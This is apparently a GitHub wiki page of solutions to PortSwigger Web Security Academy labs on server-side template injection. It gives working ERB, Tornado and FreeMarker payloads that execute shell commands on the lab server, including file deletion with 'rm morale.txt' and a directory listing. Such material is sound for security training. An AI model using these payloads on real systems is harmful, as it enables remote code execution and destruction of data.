Skip to content

Server side template injection (SSTI)

Jump to bottom
Alnoman Kamil edited this page Feb 10, 2025 · 8 revisions

Practitioner lab:
Basic server-side template injection

  • Solution

    1. View products, notice first product displays, Unfortunately this product is out of stock.
    2. Notice also the URL reflects that, https://uuid.web-security-academy.net/?message=Unfortunately%20this%20product%20is%20out%20of%20stock.
    3. Since lab description says it's an ERB template, payloads can be found in HackTricks ERB (Ruby) section.
    4. After testing with <%= 7*7 %> = 49, RCE can be achieved deleting morale.txt file like so. 
      https://uuid.web-security-academy.net/?message=<%= system("rm morale.txt") %>

Practitioner lab:
Basic server-side template injection (code context)

  • Solution

    1. Log in as wiener:peter.
    2. Use "preferred name" functionality.
    3. Make a comment.
    4. Notice "preferred name" is reflected at; https://uuid.web-security-academy.net/post?postId=<postnumber>.
    5. Change POST request to test for SSTI Tornado syntax. 
      blog-post-author-display: {{7*7}}
    6. RCE to delete morale.txt. (Payload is ChatGPT generated from Bug Hunter plugin.) 
      {{__import__('os').popen('rm morale.txt').read()}}

Practitioner labhttps://portswigger.net/web-security/server-side-template-injection/exploiting/lab-server-side-template-injection-using-documentation:
Server-side template injection using documentation

  • Solution

    1. Log in with credentials.
    2. Modify a post.
    3. Generate an error, and take note of the framework used (this is case "freemarker").
    4. use HackTricks for freemarker to craft a payload.
    5. payload 
      <#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("ls")}

Solutions for the Portswigger's Web Security Academy using mitmproxy and other cli tools instead of Burp Suite

Home

Server-side topics:

Client-side topics:

Advanced topics:

Clone this wiki locally